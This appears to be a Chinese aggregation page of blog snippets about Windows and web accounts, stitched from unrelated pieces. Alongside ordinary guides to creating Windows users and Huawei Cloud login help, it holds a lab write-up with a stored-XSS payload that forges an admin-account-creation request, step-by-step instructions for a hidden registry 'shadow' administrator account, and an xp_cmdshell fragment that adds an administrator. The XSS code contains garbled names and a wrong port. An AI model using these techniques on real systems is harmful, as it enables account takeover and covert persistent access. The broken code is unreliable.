精华内容
下载资源
问答
  • 通过普通用户的储存型XSS实现创建管理账户的CSRF利用 一、测试漏洞 打开网站:http://192.168.1.3:8007(安徽二手网) 注册一个用户并登录 添加二手信息 在物品简介处填写:alert(123) 点击打开首页,点击刚刚发布...

    [实验原理]

    通过普通用户的储存型XSS实现创建管理员账户的CSRF利用

    一、测试漏洞

    打开网站:http://192.168.1.3:8007(安徽二手网)

    注册一个用户并登录

    添加二手信息

    在物品简介处填写:<script>alert(123)</script>

    点击打开首页,点击刚刚发布的信息,弹出信息,说明漏洞存在

    二、利用漏洞

    在首页继续添加二手信息,再次编辑,在物品简介处填写内容:

    <script type="text/javascript">

    function loadXMLDoc()

    {

    var xmlhttp;

    if(window.XMLHttpRequest)

    {//code for IE7+,Firefox,Chrome,Opear,Safari

    xmlhttp=new XMLHttpRequest();

    }

    else

    {//code for IE6,IE5

    xmlhttp=new AceiveXOject("Microsoft.XMLHTTP");

    }

    xmlhttp.onriadystatechange=function()

    {if(xmlhttp.readyState==4&&xmlhttp.staus==200)

    {

    document.getElementByld("myDiv").innerHTML=xmlhttp.responseText;

    }

    }

    xmlhttp.open("POST","http://192.168.1.3:80007/admin/admin_usersetting.asp",true);

    xmlgttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

    xmlhttp.send("action=add&UserName=zhangsan&PassWord=123456~密码?~&isActive=1&isAdmin=1&pubSubCateID=91&Submit=+%C8%B7+%B6%A8+");

    }

    loadXMLDoc()

    </script>

    回到首页,推出zhangsan用户

    输入后台路径:http://192.168.1.3:8007/admin/user.asp

    使用admin/admin888~使用管理员用户密码登录~登录

    回到首页,浏览器输入:http://192.168.1.3:8007,查看帖子(修改后的)点击此条物品消息,没有什么异常现象。

    此时管理员再次进入自己的后台:http://192.168.1.3:8007/admin/user.asp在“系统用户管理”中,发现多了一个账户zhangsan。

    退出admin用户。此时用zhangsan/123456登录后台

    登录成功。

    展开全文
  • 在我们使用的win10系统中,都会有一个系统默认的账户方便用户进行管理操作,然而近日有些用户觉得自己的账户和大多数人一样,因此就想要重新创建一个win10系统账户,那么win10怎么创建账户呢?接下来小编就来给大家...

    在我们使用的win10系统中,都会有一个系统默认的账户方便用户进行管理操作,然而近日有些用户觉得自己的账户和大多数人一样,因此就想要重新创建一个win10系统账户,那么win10怎么创建账户呢?接下来小编就来给大家说说window10创建新账户操作方法。

    具体方法:

    1、首先,请大家打开Win10系统中的开始菜单,点击开始菜单之后,我们即可点击弹出的“设置”选项。

    ebe672289c27432db87d4a4f345fd7b6.png

    2、点击“设置”选项之后,我们即可进入系统的控制面板设置页面,在该设置页面中,点击“账户”选项。

    51f0ef1115594471f9bd004e2091b0f7.png

    3、接下来,在打开的用户账户设置页面中,我们点击页面左侧的“家庭和其他用户”选项。

    99e38122325d1d9a616b62ec2b07a430.png

    4、接下来,我们需要点击右侧页面,在右侧页面中选择“将其他人添加至这台电脑”选项。

    c7294dda5cb3089c37dbf27fb83e9269.png

    5、接下来,在打开的用户账户添加页面中,我们选择“我没有这个人的登录信息”选项,点击之后即可进入下一个设置项。

    6e3315444699de61425507e5d1795f6b.png

    6、然后在接下来的账户创建页面中,我们选择“添加一个没有Microsoft账户的用户”选项,点击之后即可进入本地账户的添加页面。

    711bcdeacec85b57bd20da6a0509dff1.png

    7、接下来,我们只需要输入本地账户的名称和用户账户的登录密码,点击确定按钮即可,当然,密码也可以不用输入。

    ae36b465f7f6d6b7dc6d9bb2f3f636f4.png

    8、接下来,我们就会在用户账户页面中看到一个新建立的用户账户名称,点击之后即可设置新的用户账户属性。

    ff09f2b30e166bce4dbaa39f0284cdcc.png

    9、如果你想更改一下新建立的用户账户类型,可以点击修改一下用户账户的类型,可以选择修改为“管理员或者是标准账户”选项。

    3e58083005c2d8c8d9d69214d8d8aabf.png

    10、如果你对刚刚新建立的用户账户不满意,我们还可以点击页面中的“删除”按钮,点击删除按钮之后即可删除当前新建立的用户账户。

    29620e79bac3ad53b2ec6e9dc2c5e15c.png

    上述就是window10创建新账户操作方法了,还有不懂得用户就可以根据小编的方法来操作吧,希望能够帮助到大家。

    我要分享到:

    展开全文
  • windows创建影子账户

    2021-04-14 20:38:24
    1、创建隐藏账户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 2、运行regedit打开注册表 对HKEY_LOCAL_MACHINE/SAM/SAM右键->权限赋予当前用户administrator的具有完全...

    1、创建隐藏账户并加入管理员组

    net user test$ 123456 /add
    net localgroup administrators test$ /add
    

    2、运行regedit打开注册表
    HKEY_LOCAL_MACHINE/SAM/SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限
    在这里插入图片描述
    3、重新打开注册表,定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
    查看administrator对应的键值为1f4和隐藏账户test$的键值为3e9
    然后在Users中找到对应数字的F值,将3e9的F值替换为1f4的F值
    在这里插入图片描述
    将00003e9和test$按顺序导出为1.reg和2.reg
    4、然后命令行中删除隐藏用户

    net user test$ /del
    

    5、按顺序点击刚才导出的reg文件,重新导入
    6、重新添加到管理员组

    net localgroup administrators test$ /add
    

    此时命令行和本地用户组都查不到test$这个账户,只有注册表可以看到,我们就可以用这个影子账户进行远程登录

    参考文章

    https://hackergu.com/power-shadowuser/

    展开全文
  • windows服务器多账户登录 内容精选换一换本节操作指导用户查看Windows弹性云服务器的登录日志。本节操作以2012操作系统云服务器为例。登录弹性云服务器。选择“开始 > 管理工具 > 事件查看器 ”。打开“ ...

    windows服务器多账户登录 内容精选

    换一换

    c8a5a5028d2cabfeeee0907ef5119e7e.png

    本节操作指导用户查看Windows弹性云服务器的登录日志。本节操作以2012操作系统云服务器为例。登录弹性云服务器。选择“开始 > 管理工具 > 事件查看器 ”。打开“ Windows日志 > 安全 > 筛选当前日志”。筛选事件ID为4776的事件即为远程登录日志。您还可以使用4624和4625查看登录信息。4624:Windows登录成

    通过在一台支持远程桌面的Windows系统或者Linux操作系统服务器上,部署客户端软件和浏览器,应用发布是将服务器和应用账户纳入云堡垒机管理的功能。用户获取应用发布访问权限后,通过应用账户的密码自动代填,访问客户端应用和Web应用,并以视频方式全程记录用户运维操作,实现对远程应用账户的安全管理和用户远程访问应用的操作审计。云堡垒机支持添

    windows服务器多账户登录 相关内容

    云堡垒机本身允许多用户同时登录同一资源,即不限制登录资源的用户数量。但受限于资源的多用户登录配置,多个云堡垒机用户不能同时登录同一资源账户。例如,受限于Windows资源的多用户同时登录配置,同时登录Windows资源的用户数量有最大限额。Windows 2008和Windows 2012服务器默认仅支持两个用户同时登录,即被CBH系统纳

    WinSCP工具可以实现在本地与远程计算机之间安全地复制文件。与使用FTP上传代码相比,通过 WinSCP 可以直接使用服务器账户密码访问服务器,无需在服务器端做任何配置。通常本地Windows计算机将文件上传至Linux服务器一般会采用WinSCP工具。本节为您介绍本地Windows计算机使用WinSCP工具,上传文件至Linux云服务

    windows服务器多账户登录 更多内容

    c2f51807c80a3c0a9fb1f931f2bad396.png

    云服务器网络异常、防火墙未放行本地远程桌面端口、云服务器CPU负载过高等问题均可能导致云服务器无法正常登录。本节操作介绍无法登录Windows弹性云服务器的排查思路。当您的云服务器无法远程登录时,我们建议您首先检查是否可以通过控制台远程登录。再参考排查思路检查登录异常的原因。远程登录失败时,请首先尝试能否通过管理控制台,使用VNC方式登录

    eb51cd3fd20e03ccff8238b899621069.png

    当云服务器网络异常、防火墙未放行本地远程桌面端口、云服务器CPU负载过高等场景均可能导致云服务器无法正常登录。当您的云服务器无法远程登录时,我们建议您首先检查是否可以通过控制台远程登录。再参考排查思路检查登录异常的原因。远程登录失败时,请首先尝试能否通过管理控制台,使用VNC方式登录云服务器。单击这里了解云服务器登录前的准备工作。登录管理

    9548b768b78243d473da1b2758db3f2b.png

    如果Windows操作系统云服务器未安装密码重置插件,可以参见本节内容重新设置密码。本节操作介绍的方法仅适用于修改Windows本地账户密码,不能修改域账户密码。Linux操作系统请参见重置Linux云服务器密码(未安装重置密码插件)。如果云服务器提前安装了密码重置插件,请参见在控制台重置云服务器密码操作获取新密码。公共镜像创建的云服务器

    402994aa3acda5ebf01ee1c6ade658d0.png

    华为云帮助中心,为用户提供产品简介、价格说明、购买指南、用户指南、API参考、最佳实践、常见问题、视频帮助等技术文档,帮助您快速上手使用华为云服务。

    5a6f55482f6b3f19420161bd3dfbba6a.png

    远程桌面协议(Remote Desktop Protocol,RDP),是微软提供的多通道的远程登录协议。本节为您介绍如何使用RDP文件远程登录Windows云服务器。从管理控制台下载的RDP文件对应唯一的云服务器,当前RDP文件命名规则为“云服务器名称-弹性IP”。云服务器状态为“运行中”。云服务器已经绑定弹性公网IP。所在安全组入方向

    8c18d15b4c8a3bef37b3cc91cd8c38da.png

    只有运行中的云服务器才允许用户登录。Windows操作系统用户名“Administrator”。忘记密码,请先通过“重置密码”功能设置登录密码。重置密码:选中待重置密码的云耀云服务器,并选择“操作”列下的“ 重置密码”。重置密码:选中待重置密码的云耀云服务器,并选择“操作”列下的“ 重置密码”。对于密钥方式鉴权的弹性云服务器,需先通过管理

    6fc16b91fddf423fbce11d0989b79e5d.png

    远程桌面协议(Remote Desktop Protocol,RDP),是微软提供的多通道的远程登录协议。本节为您介绍如何使用RDP文件远程登录Windows弹性云服务器。从管理控制台下载的RDP文件对应唯一的云服务器,当前RDP文件命名规则为“云服务器名称-弹性IP”。弹性云服务器状态为“运行中”。如果弹性云服务器采用密钥方式鉴权,已获

    784b2dc537fb8677eac9c3453eafe288.png

    登录Windows弹性云服务器如图1所示。(可选)使用密钥文件解析密码。对于密钥方式鉴权的弹性云服务器,需先通过管理控制台提供的获取密码功能,将创建弹性云服务器时使用的密钥文件解析为密码。具体操作,请参见获取Windows弹性云服务器的密码。对于密钥方式鉴权的弹性云服务器,需先通过管理控制台提供的获取密码功能,将创建弹性云服务器时使用的密

    3534dd170a545b94273de228dc486b40.png

    云服务器使用,服务器使用,服务器配置,云主机使用,弹性云服务器入门,ecs使用

    来自:产品

    b5693ff7a1d6bd5360d83fe2bfafdfb3.png

    本节为您介绍如何通过控制台提供的远程登录功能(即VNC方式)登录到弹性云服务器上。如果您的弹性云服务器是采用密钥方式鉴权,请在登录前先使用密钥文件解析登录密码。密钥文件解析密码请参考获取Windows弹性云服务器的密码。登录管理控制台。单击管理控制台左上角的,选择区域和项目。选择“计算 > 弹性云服务器”。获取弹性云服务器密码。VNC方式

    c8670e33c445c10cd2a0fcb5ca15332b.png

    华为云帮助中心,为用户提供产品简介、价格说明、购买指南、用户指南、API参考、最佳实践、常见问题、视频帮助等技术文档,帮助您快速上手使用华为云服务。

    展开全文
  • windows下创建隐藏账户的方法

    千次阅读 2018-10-03 15:06:29
    windows下创建隐藏账户的方法 windows下创建隐藏账户的方法 windows下创建隐藏账户的方法 1.使用管理员打开CMD使用 net user admin$ 1211 /add(创建账户) net localgroup administrators admin$ /add(添加...
  • 创建工作组,管理本地用户账户和组账户(1)为这三个部门分别创建工作组,并以各部门的名称命名工作组。例如:包含财会部门员工计算机的工作组的名称为“财会部”。(2)在“培训部”工作组中的计算机上为培训部的员工...
  • 通过命令创建或删除用户: net user user1 123456 /add 创建一个用户 user1 密码 123456 net user user1 /delete   打开控制台-》管理工具-》计算机管理-》本地用户和组 点击用户选项卡-》选择里面要赋权的用户...
  • 一·设置数据库管理员 1打开cmd 2.cd到 安装路径(…\Mongodb\bin) 3.输入mongo.exe,启动 4.输入use admin 切换到admin数据库 5.输入 db.createUser({user:“myAdmin”,pwd:“123456”,roles:[{role:“userAdmi...
  • Window进程管理

    千次阅读 2013-10-22 16:07:32
    Window进程管理 2011-05-19 10:25 243人阅读 评论(0) 收藏 举报 nullwindows磁盘网络tokenthread 可能大家对任务管理器里最熟悉的功能要数进程管理了,常常我们在怀疑中了病毒/木马的时候都会看看任务...
  • --不要干坏事   sql server中使用xp_cmdshell ...--1、允许配置高级选项 ...net localgroup administrators 用户名 /add 再把用户加为系统管理员, 转载于:https://www.cnblogs.com/gered/p/10724903.html
  • Win10创建新用户账户

    万次阅读 2019-06-28 09:37:52
    ⑤新的窗口中,可以创建一个新帐户,这个帐户为Microsoft帐户(如果是创建Microsoft帐号则到此步骤结束)。这时如果想创建本地帐户,则点击最下方的“添加一个没有Microsoft帐户的用户” 点击“我没有这个人的登录...
  • -----------------分割线:下面进入安全模式--------------------- Win + R 输入cmd,会以管理员身份启动cmd窗口 然后是创建用户 net user 账号 密码 /add 给账户赋予管理员权限 net localgroup administrators 账号 ...
  • vc 创建Windows账户

    千次阅读 2010-10-07 16:35:00
    #include <windows.h><br /> #include <lm.h><br /> #pragma comment(lib,"netapi32")  void main()  {  USER_INFO_1 ui;  DWORD dwError=0;  ui.usri1_name=L"tr0j4n";...
  • 安装Windows7时跳过创建账户

    千次阅读 2018-09-26 16:13:32
    安装window7 时候不想创建多余的账户,可以在安装界面输入命令启用管理账户 方法/步骤 安装进入到这个界面时,不用下一步,可以跳过此步,直接开启administrator 按下Shift+F10组合件,调出cmd窗口,输入...
  • 使用 ADMT 和 pwdmig 实现 window AD 账户跨域迁移系列: 介绍篇 ADMT 安装 PES 的安装 ADMT:迁移组 ADMT:迁移用户 ADMT:计算机迁移 ADMT:报告生成 PES 的安装 为了在两个目录林之间迁移密码,我们将需要配置...
  • 用户创建完毕之后,需要添加一下权限才能实现域管理账户的相关功能 转载于:https://www.cnblogs.com/Lonelychampion/p/8780247.html
  • windows server2016创建AD域账户并登录

    千次阅读 2021-03-19 22:34:03
    接下来介绍创建AD域账户并登录域账户的流程步骤 创建账户 1)右键AD服务器,选择Active Directory管理中心 2)右键AD名称,选择新建→组织单位 3)选择研发部,右键新建→用户 密码必须设置...
  • window---用户管理

    2019-10-05 16:01:51
    每个账户有自己唯一的SID(安全标识符) 用户SID:S-1-5-21-426206823-2579496042-14852678-500 系统SID:S-1-5-21-426206823-2579496042-14852678 查看sid值:whoami /user 账户密码存储位置:c:\windows\...
  • 打开这个就能创建数据库,下面那个SID...1.window的cmd编码和Oracle不同 chcp查一下编码,65001就是utf-8,936是GBK 一定要对应Oracle编码,chcp 936可以切换到GBK 这个之前刚好弄了就没这个问题 select u...
  • 1.打开【运行】输入 cmd 输入以下命令添加用户: ... ... 2.接下来添加该用户到...3. 提示命令成功就创建了一个管理员权限账户 参考链接 https://blog.csdn.net/qq_45361058/article/details/101315944 ...
  • 命令行创建Mac OS账户

    千次阅读 2014-02-18 21:13:41
    Mac Add a User From Terminal Mac ...Open a Terminal window. Click the "Go" pull-down at the top of the Finder, select "Utilities" and double-click the "Terminal" icon. Step 2 Type "sudo dscl .
  • 3、通过net localgroup Administrators demo /add可以将demo用户添加到管理员组 4、通过net user demo /del可以删除用户demo 5、通过net localgroup查看本地用户组 6、通过net user demo 123 给demo设置密码123,...
  • 5.3.1 将内部账户添加到账户管理器 示例代码 原书:Android Application Secure Design/Secure Coding Guidebook 译者:飞龙 协议:CC BY-NC-SA 4.0 “5.3.1.1 创建内部帐户”是认证器应用的示例,“5.3....
  • 【以太坊傻瓜教程】window创建eth私有链 教程简介: 本教程描述了如何搭建Ethereum私链用于在以太坊链上进行开发实验...
  • MySQL知识(二十)——用户账户管理

    千次阅读 2016-02-28 13:23:23
    MySQL提供许多语句来管理用户账户,这些语句可以用来管理包括登录和退出mysql服务器、创建用户、删除用户、密码管理和权限管理等内容。
  • 什么是用户账户?用户账户是通知 Windows您可以访问哪些文件和文件夹,可以对计算机和个人首选项(如桌面背景和屏幕保护程序)进行哪些更改的信息集合。...2,管理员帐户可以对计算机进行最高级别的控制,但应...
  • window下怎样创建隐藏帐户

    千次阅读 2008-02-22 15:03:00
    当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最 多的就是账户隐藏技术。在肉鸡上建立一个隐藏的账户,以备需要的时候使用。账户隐藏技术可谓是...
  • 想在sharepoint里面加一个新的账户,但是不能直接在sharepoint sevrer上面直接加,需要在Activate Directory Users and Computers里面加。 click Start click Windows Administrative Tools click Activate ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 14,679
精华内容 5,871
关键字:

window创建管理账户